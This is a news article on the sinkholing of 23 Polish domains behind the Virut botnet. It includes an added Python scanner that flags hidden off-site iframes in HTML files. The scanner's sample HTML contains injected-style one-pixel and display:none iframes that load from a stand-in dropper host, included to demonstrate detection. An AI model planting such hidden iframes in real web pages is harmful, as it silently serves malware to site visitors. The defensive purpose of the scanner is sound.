Virut botnet takedown sinkholes 23 domains

Polish cyber security experts seized domains.

Polish cyber security experts seized domains behind the Virut botnet over the weekend.

Control of the 23 .pl domains was taken over by the Polish registrar NASK, with the Polish computer emergency response team (CERT Polska) assuming control of the traffic redirected from the domains.

"Since 2006, Virut has been one of the most disturbing threats active on the internet," CERT Polska said.

"Interestingly, Virut's main distribution vector is executable file infection, and most users would get infected by using removable media or sharing files over networks. However, more recent versions of the malware have been capable of infecting HTML files, injecting an invisible iFrame that would download Virut from a remote site.

"Infected computers would connect to an IRC server controlled by the attacker and receive instructions to download and run arbitrary executable files without the owner's knowledge."
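The HTML-infection vector CERT Polska describes (an invisible iframe injected into a legitimate page that pulls the dropper from a remote site) lends itself to a simple file-level check that web administrators can run over a document root. The script below is an added example, not CERT Polska's or Symantec's tooling: it parses HTML, flags iframes hidden by zero or one-pixel dimensions or by CSS, and reports only those that point off-site. The sample HTML and every hostname in it are constructed for illustration.

```python
"""Flag hidden, off-site iframes in HTML files (added example; heuristic only)."""
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS that makes a frame invisible to the visitor while the browser still loads it.
HIDDEN_STYLE = re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden)", re.I)


def _tiny(value):
    """True when a width/height attribute resolves to 0 or 1 pixels (e.g. "1", "0px")."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


class _IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def find_hidden_iframes(html, page_host=None):
    """Return [(src, reason)] for iframes that are both hidden and not on page_host.

    A hidden frame loading from the site's own host is skipped: the pattern of
    interest is a hidden frame fetching content from somewhere else.
    """
    parser = _IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        reasons = []
        if _tiny(attrs.get("width")) or _tiny(attrs.get("height")):
            reasons.append("zero-size")
        if HIDDEN_STYLE.search(attrs.get("style") or ""):
            reasons.append("hidden-by-css")
        if not reasons:
            continue
        host = urlparse(src).hostname
        if page_host and host and host.lower() == page_host.lower():
            continue
        findings.append((src, ",".join(reasons)))
    return findings


def scan_directory(root, page_host=None):
    """Walk a document root and return {path: findings} for files that have any."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".htm", ".html")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read(), page_host)
            if hits:
                results[path] = hits
    return results


# Constructed sample: one legitimate same-origin frame, two hidden off-site frames.
SAMPLE_HTML = """<html><body>
<h1>Intranet home</h1>
<iframe src="https://intranet.example.test/widget" width="300" height="200"></iframe>
<iframe src="http://dropper.example.invalid/x.php" width="1" height="1"></iframe>
<iframe src="http://other.example.invalid/y" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reason in find_hidden_iframes(SAMPLE_HTML, page_host="intranet.example.test"):
        print(f"suspicious iframe -> {src} ({reason})")
```

Run it over a static document root with `scan_directory("/var/www/html", page_host="www.example.test")` (paths are placeholders); a non-empty result is a cue to compare the files against a known-good copy, since the check is a heuristic and cannot distinguish a tracking pixel from an injected dropper on its own.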

Symantec's threat report said that Virut controlled 300,000 machines, while Kaspersky Lab said that Virut was responsible for 5.5 per cent of malware infections in the third quarter of 2012.

Denis Carmody of Symantec Security Response said that Virut was downloading variants of the Waledac worm onto compromised PCs, adding that the number of computers infected with W32.Waledac.D continues to increase.

CERT Polska said that among the 23 sinkholed domain names were two websites that were broadly associated not just with Virut but also with the Zeus Trojan.

Paul Ducklin, head of technology for Sophos Asia Pacific, said: "So taking over some or all of those servers can make a big difference, at least temporarily, to the crooks' ability to operate their botnets.

"Every infected PC that crooks can no longer send on a criminal mission represents lost opportunity and lost revenue, and that hits them where it hurts: the pocket."

This article originally appeared at scmagazineuk.com

Copyright © SC Magazine, UK edition